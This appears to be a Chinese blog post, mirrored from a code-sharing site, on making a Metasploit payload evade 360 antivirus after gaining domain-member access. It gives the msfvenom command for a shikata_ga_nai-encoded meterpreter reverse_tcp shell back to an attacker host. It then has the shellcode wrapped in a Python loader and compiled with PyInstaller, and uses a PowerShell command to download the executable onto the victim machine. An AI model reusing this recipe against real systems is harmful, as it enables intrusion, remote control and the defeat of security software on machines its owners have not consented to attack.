zoukankan      html  css  js  c++  java
  • msf免杀

    卧槽 最近闲的没事干 搞一下渗透学习下

    拿到 一个域成员权限,但是有360  。。。。(&……%

    好烦啊

    都不能免杀

    突然看到一个帖子 很牛逼 依然到现在还是免杀的

    首先msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.1.100 -e x86/shikata_ga_nai -i 11 -f py > 1.py

    可以修改成好点的端口443啊 80都行

    然后cat下1.py  把里面的shellocde拷贝到下面这个py 里替换掉

    代码如下 https://github.com/xsser/privatemsf/

    自己换成msf生成的shellcode

    然后开始。。安装pip install pyinstaller  这个地方可以用下国内的源 -i http://pypi.douban.com/simple --trusted-host pypi.douban.com

    https可能还遇到各种问题 所以我找http的源就行了

    然后下载蹭蹭蹭的速度

    搞定了之后

    PyInstaller --console --onefile  shellcode.py
    

    然后。。。就生成了一个二进制文件

    想办法拖到对面的机器上。吗的 我遇到了360  只能用unc那种\share目录的方法去我的vps上下载 或者是

    powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.174.145/shellcode.exe','C:	estupdateshellcode.exe')
    

     总之这个不是重点

  • 相关阅读:
    ZOJ Problem Set
    ZOJ Problem Set
    UVa 11464 偶数矩阵 枚举
    poj 1753 枚举
    Codeforces 637D 模拟
    hdu 5631 并查集
    hdu 5438 并查集
    UVa 10129 单词 (有向欧拉路+并查集)
    hdu 3018 欧拉路定理+并查集
    并查集的初步学习
  • 原文地址:https://www.cnblogs.com/xsserhaha/p/10703627.html
Copyright © 2011-2022 走看看